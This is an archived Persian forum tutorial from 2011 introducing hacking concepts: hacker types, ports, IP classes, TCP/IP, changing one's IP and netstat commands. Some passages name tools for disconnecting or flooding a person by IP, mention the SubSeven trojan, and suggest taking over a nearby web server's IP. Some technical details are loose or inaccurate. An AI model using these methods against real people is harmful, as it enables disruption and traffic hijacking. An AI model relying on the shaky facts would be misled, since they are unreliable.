PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : آموزشی آشنایی با روشهای هک و روشهای جلوگیری از آن (حتما بخوانید مهم)



e.einitabar
19th January 2011, 01:22 AM
1. آشنایی با روشهای هک و روشهای جلوگیری از آن


سلام بر همه دوستان مطالب ارائه شده مجموعه ای از مطالب جمع آوری شده از جاهای مختلف برای آشنایی دوستان فقط میباشد.
امیدوارم فقط جنبه آموزشی داشته باشه و فقط راهی برای مبارزه با روشهای هک شدن باشه....





هکر کسی است که با سيستم های کامپيوتری آشناست و می‌تواند با استفاده از آن کار های خود را بدون اجازه انجام دهد
- سوال: يک هکر از چه راهی وارد يک سيستم می‌شود؟
از راه شبکه (نه بابا ! )
بايد توجه کنيد که هر سيستم کامپيوتری (به عبارت بهتر هر سيستم عامل) به هر حال محصول کار تعدادی انسان است و حتما دارای تعدادی bug (خطاهايی که بعد از ارائه محصول به بازار به تدريج کشف می‌شوند) خواهد بود. بعد از اينکه يک باگ مشخص شد، شرکت ها نرم‌افزارهايی را به‌سرعت (در عرض چند ساعت ) ايجاد می‌کنند تا مشکل رفع شود اين‌ها را patch می‌گويند. و بعد مديران شبکه (Webmasters) در عرض چند روز تا چند سال (اين آخری در مورد ايرانه) آنها را download کرده و مشکل را حل می‌کنند. در اين فاصله هکرها دمار از روزگار اين سايت‌ها درمی‌اورند...


انواع مختلف هکرها و نوع کارهایشان:


*** Hacker واقعی سامورايی :کسی که هدفش از نفوذ به سيستم‌ها نشان دادن ضعف سيستم‌های کامپيوتری است نه سوءاستفاده ...


***Wacker واکر:کسی که هدفش از نفوذ به سيستم‌ها، استفاده از اطلاعات آن سيستم‌هاست (جرو هکر‌های کلاه‌ سياه)


***Cracker کراکر:کسی که هدفش از نفوذ به سيستم‌ها، خرابکاری و ايجاد اختلال در سيستم‌های کامپيوتری است. (جرو هکر‌های کلاه‌ سياه)


***Preaker :از قديمی‌ترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراق‌سمع و ... بود. اين جزو آموزش من نيست چون کار خيلی بديه (-;


انواع هکرها از دیدگاهی دیگر:
1-جوجه‌هکرها (احمق کوچولوها):
توانايی‌ها: بلدند از Sub 7 , 187استفاده کنند و فکر کنند ديگه همه‌چی رو ياد گرفته‌اند !


2- خروس‌هکر‌ها يا مرغ‌هکرها (احمق‌های بزرگتر):
توانايی‌ها: Mail Box را هم می‌توانند Bomb کنند ... ماشاءالله !


3-هکرهای قابل‌احترام :
دارند ياد می‌گيرند و هنوز ۲،۳ سال کار دارند.


4-هکرهای پيش‌کسوت:
ديگه آفتاب لبه بومه ... هکرهای قابل احترام را دوس دارند


تقسيم‌بندی سیستمها و انواع کامپيوتر‌های شبکه:
=> کامپيوترهای Server : کامپيوترهايی که کارشان تامين اطلاعات در شبکه است، مثلآ کامپيوترهايی که سايت‌ها را نگه می‌دارند.
=> کامپبوتر‌های Client : کامپيوترهايی که استفاده کننده هستند مثل همين کامپيوتر خودتان که داريد ازش کار می‌کشيد.


انواع سيستم‌ عامل‌هايی که Server ها از آن استفاده‌ می‌کنند:


سيستم‌های فعلی:
o خانواده Unix مثل (FreeBSD, Linux, SunSolaris )
o خانواده Windows مثل ( WinNT, Win2000)
o OsMac سيستم‌های قديمی((AIX, IRIS, DEC10, DEC20
سوال: کدام‌ها را بايد ياد گرفت؟
Win2000, UnixLinux)) را بايد ياد بگيريد. پيشنهاد من اين است که Win2000و RedHatLinux را روی کامپيوتر خود همزمان داشته باشيد.


برای شروع چه چيزی لازم است؟
4. Win2000 , Linuxرا روی کامپيوتر خود نصب کرده و شروع به يادگيری کنيد.
5. شروع به يادگيری زبان C کنيد.
6. شروع به يادگيری TCP/IP کنيد. (يک کتاب بخريد)
7. مهمترين چيز علاقه به طی کردن يک راه بسييييييار طوووووولانی
- تقسيم‌بندی انواع حملات
8. حمله به روش Denial of ServiceAttack) Dos)
9. حمله به روش Exploit
10. حمله به روش InfoGathering تلنت کردن
11. حمله به روش Disinformation
تعریف IP و PORT
IP :
شماره‌ ايست که به هر کامپيوتر متصل به اينترنت داده می‌شود تا بتوان به‌کمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌های کلاينتی که معمولا به روشی غير از شماره‌گيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل می‌شويد، عددی جديد به شما نسبت داده می‌شود.
اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی به‌صورت زير نوشته می‌شود:
xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شماره‌ها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسم‌هايی مثل www.yahoo.com که برای اتصال استفاده می‌کنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد.
در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح می‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول می‌گيريد، مابين 192 تا 223 خواهد بود.
اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار می‌تواند مفيد باشد.
بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در commandprompt استفاده کنيد. (البته يک سری نکات فنی داريم که بعدا می‌گم)


Port:
در ساده ترين تعريف، محلی است که داده‌ها وارد با خارج می‌شوند. در مبحث هک معمولا با پورت‌های نرم‌افزاری سروکار داريم که به هر کدام عددی نسبت می‌دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت‌ها کار خاصی را نسبت می‌دهند و بقيه به‌صورت پيش‌فرض برای استفاده شما هستند. پورت‌های که فعال هستند، هرکدام توسط يک نرم‌افزار خاص مديريت می‌شوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرم‌افزار اين کار انجام شود و اين نرم‌افزار بر روی پورت ۲۵ منتظر (فال‌گوش) می‌ماند. اينجا ممکن است شخصی از فلان نرم‌افزار و ديگری از بهمان نرم‌افزار استفاده کند ولی به‌هر حال پورت ۲۵ هميشه برای ارسال Email است.


در پايين ليستی از مهمترين پورت‌ها و کاربردشان را می‌بينيد:



Port Num Service Why it is phun!




7 echo Hostrepearts what you type



9 discardDev/null


11 systatLots ofinfo on users


13 daytime Time and date at computerslocation


15 netstatTremendous info on networks


19 chargenPours out a stream of ASCIIcharacters


21 ftp Transfers files


23 telnet Where you login


25 smptForgeemail


37 time Time


39 rlpResource location


43 whoisInfo on hosts andnetworks


53 domain Nameserver


70 gopher Out-of-date infohunter


79 finger Lots of info on users


80 http Webserver


110 pop Incoming email


119 nntp Usenet news groups -- forge posts, cancels


443 shttpAnother web server


512 biff Mailnotification


513 rlogin Remote login


who Remote who anduptime


514 shell Remote command, no password used!


syslogRemotesystem logging


520 route Routing informationprotocol





از ميان اين پورت‌ها شماره‌های ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و۱۱۹فعلا برای ما مهم‌ترند و به‌تدريج با آنها آشنا خواهيد شد.


RFC چيست؟
متون بسيار کامل ولی خشک و ثقيل که در مورد مفاهيم مختلف شبکه بحث می‌کنند. اين فايل‌ها به صورت متنی و با پسوند txt هستند و به‌عنوان مرجع (برای مراجعه و نه مطالعه کامل) کاربرد دارند. اين فايل‌ها يک‌بار منتشر شده و هرگز تغيير داده نمی‌شوند (حتی اگر حاوی اشتباه باشند.)


- فايل‌های RFC از کجا قابل دسترسی هستند؟


RFCها از سايت‌های بسياری قابل دسترس هستند مثل :

- http://www.ietf.org/rfc/xxxxxxx.txt



که به‌جای xxxxxxx نام rfc موردنظر را می‌نویسيم. مثلا برای دسترسی به rfc791 بايد آدرس را به‌ صورت زير تايپ کنيم:

http://www.ietf.org/rfc/rfc791.txt

1. آيا با دانستن IP يك نفر ميشه از طريق برنامه SubSeven كسي را هك كرد!!!
-آيا كسي IP من را بداند مي تواند مرا هك كند ؟؟؟
- يكي IP من را دارد و مي گويد اگر فلان كار را نكني مانيتور تو رو مي سوزانم آيا ميتونه ؟؟
و ..... تصميم گرفتم كه يك سري از كارها كه ميشه با داشتن IP انجام داد را برايتان شرح بدم


قطع ارتباط شخص با اينترنت :
شما ميتوانيد با استفاده از برنامه هايي مانند IPDisconnect يا Rocket و دانستن IP شخص مقابل او را از اينترنت بيرون بندازيد


كند كردن سرعت ارتباط شخص با اينترنت :
با استفاده از برنامه هايي مانند Vai-te-ja-icmpBomber و... با فرستادن Packet هاي بسيار در يك زمان سرعت شخص را عملا كاهش دهيد ....


پيدا كردن پورت هاي باز :
وقتي كه IP يك فرد را داشته باشيد ميتوانيد با استفاده از برنامه هاي Port Scanner سيستم شخص مقابل را جستجو كنيد و اگر پورت بازي وجود داشت در صورت امكان از آن استفاده كنيد


يافتن تروجان فعال در سيستم مقابل :
خب مانند بالا بعضي از برنامه ها با دادن IP يك دستگاه آن دستگاه را براي تروجان هاي فعال جستجو مي كند و اگر پورت بازي مربوط به يك تروجان را پيدا كند به شما گزارش ميدهند


اما آيا ميتوان با دانستن IP يك شخص با برنامه هايي مانند SubSeven و.. به سيستم قرباني حمله كرد؟


در حالت عادي خير ، يعني اينكه براي كار كردن با برنامه هاي تروجان مانند Sub Seven بايد يك Server در سيستم قرباني فعال شود ( فايل سرور فايلي است كه با برنامه هاي تروجان مانند Sub Seven ساخته شده و بايد برروي سيستم قرباني اجرا شود و پس از اجراي فايل سرور يك پورت در سيستم قرباني باز ميشود كه راه نفوذ شخص را باز مي كند ) پس در نتيجه اگر قبلا فايل سروري برروي سيستم قرباني باز نشده باشد يا اينكه فايل سرور برروي سيستم او موجود نباشد شما هيچ كاري نميتوانيد بكنيد با برنامه هاي Trojan


چگونه كاري كنيم كه هيچ كسي نتواند آسيبي از طريق دانستن IP ما به ما برساند؟
خب تنها كاري كه شما بايد انجام بدهيد استفاده از يك فاير وال ( ديوار آتش ) Firewall در سيستم خودتان ميباشد.


اين برنامه ها پورتهاي باز شما را بسته و شما را در مقابل حمله احتمالي از طريق IP و همچنين دسترسي برنامه هاي مشكوك را به اينترنت ( براي ارسال يا دريافت اطلاعات ) محدود مي كند . برنامه هايي مانند ZoneAlarm يا Tiny Personal Firewall و...


مطالب گذشته به طور كلي با انواع شبكه ، كلاسهاي مختلف IP ، انواع پورتها و .. آشنا شديد . در بخش و چند بخش آینده به طور خلاصه مبحث TCP/IP را به عنوان پيش نيازي براي درسهاي آينده مي آموزيم .


مقدمات و نيازهاي شما براي يادگيري TCP/IP :
TCP/IP مبحثي بسيار پيچيده و گسترده است و يادگيري آن نياز به صرف وقت و تامل زيادي دارد. از اين رو براي يادگيري بهتر و عميق تر اين مهم كه پایه و اساس دروس شبكه در تمام سطوح است ، ميتوانيد به كتاب TCP/IP نوشته Joe Casad و Bob Willsey و يا RFC هايي كه در طي دروس معرفي مي شوند مراجعه كنيد . دروسي كه در پيش و روي شما قرار خواهد گرفت نيز به صورت طبقه بندي شده از همين منابع و مراجع خواهد بود .


تاريخچه و روند تشكيل پروتكل TCP/IP :
در ابتدا شبكه ها به صورت جداگانه فعاليت مي كردند و چيزي به عنوان شبكه WAN وجود نداشت به طور مثال هر اداره يك شبكه LAN براي خود راه اندازي ميكرد و فعاليت هاي خود را در آن انجام ميداد.براي اينكه شبكه ها پروتكل هاي خصوصي طراحي مي شد و شبكه براساس سياستهاي تعريف شده در آن پروتكل شروع به فعاليت مي كرد .


با گذشت زمان وزارت دفاع آمريكا به اين فكر افتاد كه تمام شبكه هاي خود را به هم متصل كند تا اطلاعات نظامي مورد نياز را به راحتي در اختيار ادارات خود قرار دهد اما براي اين كار يك مشكل بسيار بزرگ وجود داشت و آن عدم همخواني پروتكل هاي مختلف با يكديگر بود .


براي حل اين مشكل محققان و مهندسان شبكه شروع به ساخت و طراحي پروتكلي كردند كه براي تمام شبكه ها قابل استفاده و در جهت حفظ اطلاعات نظامي وزارت دفاع از امنيت خوبي برخوردار باشد. نتيجه اين تلاش و كوشش بوجود آمدن پروتكلي به نام ARPnet شد كه شبكه هاي LAN وزارت دفاع آمريكا را به يكديگر متصل مي كرد .


چند سال بعد موسسه علوم ملي آمريكا به منظور برقراري ارتباط بين مراكز تحقيقات مختلف شروع به گسترش شبكه هاي كامپيوتري كرد . از آن پس تغييراتي در پروتكل ARPnet بوجود آمد تا به يك پروتكل واحد براي شبكه اي غير متمركز كه اكنون آن را اينترنت مي ناميم تبديل شود . پس از انجام اين تغييرات پروتكل ARPnet به پروتكل TCP/IP كه هم اكنون در تمامي شبكه ها مورد استفاده قرار ميگيرد تبديل شد.


ويژگي هاي مهم پروتكل TCP/IP :
از ويژگي هاي مهم پروتكل TCP/IP مي توان :
1- تعيين صحت انتقال داده ها
2- مسير يابي پويا را نام برد .


تعيين صحت انتقال داده ها :
براي انتقال اطلاعات در شبكه اي مبتني بر TCP/IP لازم است تا ابتدا داده ها به صورت بسته هايي اطلاعاتي كه به آنها packet گفته مي شود در آيند تا بتوان انها را برروي لايه فيزيكي شبكه ارسال كرد.
يك فايل براي اينكه قابل ارسال برروي لايه فيزيكي شبكه شود ساختار اوليه خود را از دست داده و به چندين Packet جداگانه تقسيم مي شود كه اين Packet ها يكي پس از ديگيري به طرف كامپيوتر مقصد حركت مي كنند . كامپيوتر مقصد پس از دريافت هر Packet به كامپيوتر مبدا Packet ي مبتني بر دريافت صحيح Packet فرستاده شده ارسال مي كند تا كامپيوتر مبدا Packet بعدي را بفرستد.
به اين ترتيب تمام Packet ها به طور صحيح به مقصد رسيده و در آنجا پس از اسمبل شدن به صورت فايل اوليه در مي آيد.


مسير يابي پويا :
درشبكه هاي بزرگ مانند اينترنت كه از صدها هزار شبكه كوچك و بزرگ تشكيل شده است براي اين كه بتوانيم اطلاعاتي را از شبكه خود به شبكه اي ديگر انتقال دهيم بايد از وسيله اي به نام مسير ياب كمك بگيريم.
وظيفه مسير يابRouter انتقال داده از يك شبكه به شبكه اي ديگر است به گونه اي كه داده از كوتاهترين مسير ممكن به مقصد برسد.


در اين مقاله آموزش می دیم چه جوري IP خودتون را با يه IP ديگه از همون Range عوض کنين. هر موقع که به اينترنت وصل ميشين، پروتکل DHCP به شما يه IP تخصيص ميده. عوض کردن اين IP کار چندان سختي نيست و البته ميتونه مفيد هم باشه! موقعي که شما تحت حمله DDoS هستين يا وقتي که ميخواين تمامي درخواستها به يه وب سرور رو به طرف خودتون Redirect کنين يا فرضاً وقتي که IP شما بسته شده و ميخواين به جاي اون از يه IP ديگه در Range خودتون استفاده کنين و يا ... به تغيير دادن IP احتياج پيدا ميکنين.
قبل از اينکه شما بتونين IP خودتون رو عوض کنين، بايد يه سري اطلاعات جمع کنين. اين اطلاعات عبارتند از : محدوده IP شما، Subnet Mask، مدخل (Gateway) پيش گزيده، سرور DHCP و سرورهاي DNS


1. به دست اوردن محدوده IP : بدست اوردن IPRange اصلاً سخت نيست! فرض کنيد IP شما 24.193.110.255 باشه. شما ميتونين به طور مشخص از محدوده زير براي IP جديد خودتون انتخاب کنين :
24.193.110.1 < [آي پي جديد] < 24.193.110.255 بدست آوردن ip رو قبلآ گفتیم


2. به دست اوردن SubnetMask، مدخل، سرورDHCP و DNS : به دست اوردن اينها هم ساده‌است! يه خط فرمان DOS باز کنين و توش تايپ کنين ipconfig /all شما حالا بايد بتونين يه چيزي شبيه به اين ببينين :



Windows IP Configuration



Host Name . . . . . . . . . . . . : My Computer Name


Primary Dns Suffix . . . . . . . :a


Node Type . . . . . . . . . . . . : Unknown


IPRouting Enabled. . . . . . . . : Yes


WINS Proxy Enabled. . . . . . . . : Yes




Ethernet adapter Local Area Connection:




Connection-specific DNS Suffix . : a



Description . . . . . . . . . . . : Realtek RTL8139/810xFamily Fast Ethernet NIC


Physical Address. . . . . . . . . : 00-C0-33-CF-EE-A3


Dhcp Enabled. . . . . . . . . . . : No


IP Address. . . . . . . . . . . . : 192.168.0.5


Subnet Mask . . . . . . . . . . . : 255.255.0.0


IP Address. . . . . . . . . . . . : 192.168.1.5


Subnet Mask . . . . . . . . . . . : 255.255.0.0


Default Gateway . . . . . . . . . : 192.168.1.1


DNS Servers . . . . . . . . . . . : 192.168.1.1



خوب! اين تموم اطلاعاتي بود که نياز داشتين. بهتره اون خط فرمان DOS رو باز نگه دارين يا اينکه اطلاعاتش رو کپي کنين. (ستور را نوشته بعد از علامت < نام فایل متنی مورد نظر را مینویسید تا اطلاعات در آن کپی شود.)
مثال:

c:\> ipconfig /all > yourtextname.txt



3. عوض کردن IP : براي عوض کردن IP خودتون، اول بايد يه IP انتخاب کنين (يادتون نره که تو محدوده باشه!) به نظر من بهتره اول مطمئن بشين که اين IP جديد مُرده! (همون Dead) بلدين که چطوري؟ اين IP رو پينگ کنين و اگه TimeOut داد مطمئن باشين که ميشه ازش استفاده کرد. حالا در Control Panel بريد به NetworkConnections و روي Connection فعال دابل کليک کنين. دکمه Properties رو بزنين و بريد به برگه Networking. حالا (Internet Protocol (TCP/IP رو انتخاب کنين و دکمه Properties رو بزنين. در پنجره جديدي که باز شده، قسمتهاي Use the following IP address و Use the following DNS server addressesرو با توجه به اطلاعاتي که در قسمت 2 به دست اوردين پر کنين. در قسمت اول، IP اي رو که انتخاب کرديد (IP جديد) و در قسمت دوم، آدرس DNSServer رو وارد کنين. حالا تغييرات رو ثبت و تأييد کنين. فقط يه تست کوچيک مونده! در مرورگر خودتون، آدرس يه سايت رو وارد کنين. اگه صفحه سايت اومد، بدونين که با IP جديد دارين کار ميکنين. براي اينکه مطمئن بشين که تغييرات اعمال شدن، دوباره در خط فرمان DOS تايپ کنين ipconfig /all اگه پس از اجراي اين دستور، IP و DNS جديد رو ديديد، بدونين که درست عمل کرديد.


حملات DDoS و DoS
اگه فايروال شما نشون بده که شما تحت يه حمله DDoS هستين، اين معمولاً موقعيه که شما داريد از طرف يک يا چند تا IP از طريق UDP مورد حمله قرار ميگيرين. در اين حالت شما ميتونين با استفاده از روش "عوض کردن IP" که در بالا توضيح داده شد، از خودتون محافظت کنين.


وب سرورها و سرويس هاي ديگه
اگه شما ميدونين که در محدوده IP شما يه وب سرور قرار داره، ميتونين IP اون رو بدزدين و خودتون يه وب سرور بشين! به اين ترتيب هر درخواست DNS اي که براي اون IP ارسال بشه، به شما Redirect ميشه و به جاي اون سايت، صفحه شما نشون داده ميشه!


آشنايي با Netstat
اين دستور که با سويچ هاي ديگري هم استفاده ميشه يکي از دستورايي هست که همه هکر ها اول باهاش آشنا ميشن.که با تايپ اين دستور شما متوجه آي پي سيستمها و پورتهايي که با آنها در ارتباط هستيد ميشويد و مشاهده ميکنيد که چه پورتهايي Listening و يا Established هستن اين باعث ميشود اگر پورتي مخصوص يک تروجن مثل 27374 که پورت اصلي Sub7 هست در سيستم شما باز بود شما متوجه اين پورت باز بروي سيستمتان بشويد.
اگر در قسمت Foreign Address هم يک آي پي بوسيله پورتي به سيستم شما وصل بود شما به سرعت متوجه مي شويد که يک نفر با آن آيپي در سيستم شماست ، پس اين راهيست که متوجه گرديد سيستمتان آسيب پذير است يا نه ، براي مثال من با تايپ دستور Netstat درCommand Promp پس از اتصال به اينتر نت نتايج زير را گرفتم :





C:\WINDOWS>netstat




ActiveConnections




ProtoLocalAddressForeignAddressState




TCP Midia: 1454cs33.msg.sc5.yahoo.com:5050ESTABLISHED




TCPMidia: 1488 63.123.44.222:80ESTABLISHED




TCP Midia: 1491 opi1.vip.sc5.yahoo.com:80TIME_WAIT




TCPMidia: 1497 64.187.54.23:80ESTABLISHED




TCPMidia: 1498 64.187.54.23:80ESTABLISHED


همانطور که ملاحظه ميکنيد اين دستور گاهي اوقات اسم صاحب سيستم کلاينتي که شما با آن در ارتباط هستيد را نيز ميدهد و چون اينجا من با کسي در PM نبودم اسم کسي را نميبينيد ولي اگر کسي با من چت کند و دستور Netstat را اجرا كند اسم را ميبيند و متوجه ميشود کهMidia صاحب آن سيستم کلاينتي مي باشدکه در حال چت كردن با آن است و همچنين در اين قسمت مشخص است که من با پورت 5050 با ياهو مسنجر ارتباط برقرار کرده ام و نيز نتايجي که در زير Local Address مشخص است اطلاعاتي درباره خود من مي باشد . و نتايجي که در Foreign Address بدست مياد مشخص ميکند که ما با چه سرور يا کلاينتي در ارتباط هستيم . که در سطر پنجم مثال بالا يعني 63.123.44.222:80 آيپي سايت ياهو مي باشد و مشخص ميكند كه من در سايت ياهو بوده و به وسيله پورت 80 که پورت Http ميباشد با اين وب سرور ارتباط برقرار کرده ام و در قسمت Status هم مشخص ميشود که شما با چه پورتهايي Established هستيد يعني ارتباط برقرار کرده و وصل هستيد و چه پورتهايي Listening يا منتظر Request و در حال شنيدن مي باشيد ، بنابراين با دستور Netstat مي شود يک عمل مانيتورينگ از تمام آيپي ها - پورتها و ماشينهايي که شما با آنها در ارتباط هستيد گرفت .



دستور?/ Netstat :
Help برنامه Netstat را معرفي ميکند و سويچ هاي که ازش ميتوان استفاده کرد و در مقابل هر سويچ در مورد کار آن توضيح مختصري ميدهد.


دستور Netstat -n :
با اين دستور ميتوان آيپي و پورت سيستمي که شما با آن در ارتباط هستيد را بدست آورد .


براي مثال وقتي شما با يک نفر در ياهو مسنجر چت ميکنيد پورت ۵۰۵۰ روي سيستم open هست چون ياهو از پورت ۵۰۵۰ استفاده ميکند پس با تايپ netstat -n خواهيد داشت: پ




Active Connections




Proto Local Address Foreign Address State



TCP 217.219.223.21:1425 216.136.175.226:5050 TIME_WAIT


TCP 217.219.223.21:1431 64.242.248.15:80 ESTABLISHED


TCP 217.219.223.21:1437 217.219.223.38:5101 ESTABLISHED



همانطور که ملاحظه ميکنيد من در اين لحظه با آيپي 217.219.223.38 در حال چت کردن بودم که اشتراکش هم از رايانه روش بوده (مثل خودم)و آي پي خود نيز پروتکلي که ما بوسيله آن با يک سيستم ارتباط برقرار کرديم Proto مشخص ميشود در قسمت Local Address من هم TCPارتباط برقرار شده است.


دستور Netstat -na :
با تايپ کردن اين دستور در Command Prompt تمام پورتهايي که داده ها و بسته ها را مي فرستند مشخص ميشود ، نشان " na " در تمام دستورات به معني نمايش همه پورتها و ليست کردن آدرسهاي شبکه و شماره فرمها در يک قالب عددي مي باشد ، براي مثال من با تايپ اين فرمان در Command Prompt اين نتايج را گرفتم :



C:\WINDOWS>netstat -na



Active Connections


Proto Local Address ForeignAddress State


TCP 0.0.0.0:1954 0.0.0.0:0 LISTENING


TCP 0.0.0.0:5101 0.0.0.0:0 LISTENING


TCP 217.219.223.21:1954 207.46.106.21:1863 ESTABLISHED


TCP 217.219.223.21:1971 216.136.225.36:5050 ESTABLISHED


TCP 217.219.223.21:2031 63.121.106.74:80 TIME_WAIT


TCP 127.0.0.1:1025 0.0.0.0:0 LISTENING


*:* UDP 0.0.0.0:1958


*:* UDP 64.110.148.59:9


*:* UDP 64.110.148.59:137


*:* UDP 64.110.148.59:138



خب ميبينيد که پورتهاي باز روي سيستم من ليست شده است. مثل 1954-1971-2031


دستور Netstat -a :
اين دستور نيز مثل دستور Netstat -an يا na- عمل ميکنه فقط فرقش در اينه که اين دستور پورتها را با معادل اسميشان نشان ميدهد ، براي مثال پورت 139 را با معادل اسميش يعني Netbios نشان ميدهد و همچنين مانند دستور Netstat اسم صاحب سيستم را پرينت ميكند .(اين دستور براي تست کردن نقطه ضعفها و پورتهاي باز در سيستم هاي خودمان بسيار مفيد ميباشد و اگر سيستم آلوده به تروجن بود ميشود از اين دستورها و کلاً برنامه Netstat اين موضوع را فهميد ، پس آنهايي که سوال ميکنند ما چگونه بفهميم سيستم خودمان آلوده به تروجن هست يا نه ، استفاده از اين دستور و کلاً دستورات Netstat ميتواند خيلي به آنها کمک کند )


دستور Netstat -p xxx :
منظور از xxx يعني آن پروتکلي که شما در نظر داريد که ميتواند TCP و UDP باشد.


دستور Netstat -e :
اين دستور نيز يکي از دستورات Netstat است که آماري از ارتباطها و بسته ها و شماره هاي ارسال و ذخيره بسته ها و داده ها را نشان ميدهد .(اين دستور بيشتر براي ويندوزهاي 98 , me و همينطور مودمهايي که آمار بسته ها را نميدهند خوب و مفيد است چون در ويندوز 2000 – XP قسمتي از اين آمار براحتي در اختيار User قرار ميگيرد ، و شما ميتونيد با استفاده از اين دستور ترافيک ISP و شبکه را ببينيد و همينطور برنامه هايي که در حال دانلود هستسد را چک کنيد و يا اگر بسته اي در ارسالش مشکلي پيش بياد ميتوانيد در قسمت Errors مشاهده کنيد ، ...)


دستور Netstat -r :
اين دستور توسط کاربران معمولي اينترنت زياد بکار گرفته نمي شود چون درک بعضي از گزينه هاش براي کاربران عادي دشوار ، بحرحال اين دستور جزييات دقيقي مثل آدرس Gateway - Interface Metric -Netmask , ... درباره آدرس آي پي شما در شبکه ميدهد ، همچنين در ويندوزهاي8 9 - ME کار دستور Netstat -a را هم انجام ميدهد

================================================== =========================



Interface List


0x1 ........................... MS TCP Loopback interface


0x2 ...00 13 dd bb 72 d7 ...... Intel(R) PRO/Wireless 2200BG Network Connection - Packet Scheduler Miniport


0x10004 ...00 e0 ee cf c3 a3 ...... Realtek RTL8139/810x Family Fast Ethernet NIC - Packet Scheduler Miniport


================================================== =========================


================================================== =========================


Active Routes:


Network Destination NetmaskGateway Interface Metric


0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.5 20


127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1


169.254.0.0 255.255.0.0 169.254.224.220 169.254.224.220 30


169.254.224.220 255.255.255.255 127.0.0.1 127.0.0.1 30


169.254.255.255 255.255.255.255 169.254.224.220 169.254.224.220 30


192.168.0.0 255.255.0.0 192.168.1.5 192.168.1.5 20


192.168.0.5 255.255.255.255 127.0.0.1 127.0.0.1 20


192.168.0.255 255.255.255.255 192.168.1.5 192.168.1.5 20


192.168.1.5 255.255.255.255 127.0.0.1 127.0.0.1 20


192.168.1.255 255.255.255.255 192.168.1.5 192.168.1.5 20


224.0.0.0 240.0.0.0 169.254.224.220 169.254.224.220 30


224.0.0.0 240.0.0.0 192.168.1.5 192.168.1.5 20


255.255.255.255 255.255.255.255 169.254.224.220 169.254.224.220 1


255.255.255.255 255.255.255.255 192.168.1.5 192.168.1.5 1


Default Gateway: 192.168.1.1


================================================== =========================


Persistent Routes:


None


RouteTable


1. درس اول: IPچیست؟



شماره‌ ايست که به هر کامپيوتر متصل به اينترنت داده می‌شود تا بتوان به‌کمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌های کلاينتی که معمولا به روشی غير از شماره‌گيری (DialUp) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل می‌شويد، عددی جديد به شما نسبت داده می‌شود.


اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی به‌صورت زير نوشته می‌شود:


xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شماره‌ها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسم‌هايی مثل www.yahoo.com که برای اتصال استفاده می‌کنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد.


در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح می‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول می‌گيريد، مابين 192 تا 223 خواهد بود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار می‌تواند مفيد باشد.



بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در commandprompt استفاده کنيد.
1. درس دوم: تقسيم بندی آدرس‌های IP
آدرس‌های ip به ۵ کلاس تقسيم‌بندی می‌شوند که A تا E نام‌ دارند ولی از اين بين سه کلاس اول (يعنی C,B,A) کاربرد عملی دارند که آنها را شرح می‌دهيم:



۱- کلاس A :اگر ip را به‌صورت xxx.yyy.yyy.yyy در نظر بگيريد، اين کلاس تمام ipهايی را شامل می‌شود که xxx بين ۱ تا ۱۲۶ است. اين کلاس ويژه backbone های بزرگ اينترنتی است و در هنگام ثبت domain برای گرفتن ip از آنها استفاده می‌شود. بنابراين اکثر سايت‌ها چنين ipهايی دارند. اين کلاس را 8/ هم می‌گويند.


۲- کلاس B : اين کلاس تمام ipهايی را شامل می‌شود که xxx بين ۱۲۸ و ۱۹۱ است.
اين کلاس هم از جمله کلاس‌های پرکاربرد است. اين کلاس را 16/ هم می‌گويند.


۳- کلاس C : اين اين کلاس تمام ipهای را شامل می‌شود که xxx بين ۱۹۲ و ۲۲۳ است. اين کلاس معمولا به ISP هايی که خدمات dial-up ارائه می‌دهند، تعلق می‌گيرد (اين جمله چندان مستند نيست).


بنابراين اگر به‌صورت dial-up به اينترنت متصل شويد، چنين ip می‌گيريد. اين کلاس را 24/ هم می‌گويند.



سوالی که پيش می‌آيد اين است که xxx چرا نه در کلاس A و نه در B، عدد ۱۲۷ را شامل نمی‌شود؟
جواب اين‌ است که ۱۲۷ برای کامپيوتر خودمان رزرو شده است. مثلا 127.0.0.1 معمولا يعنی localhost يعنی خودمان.
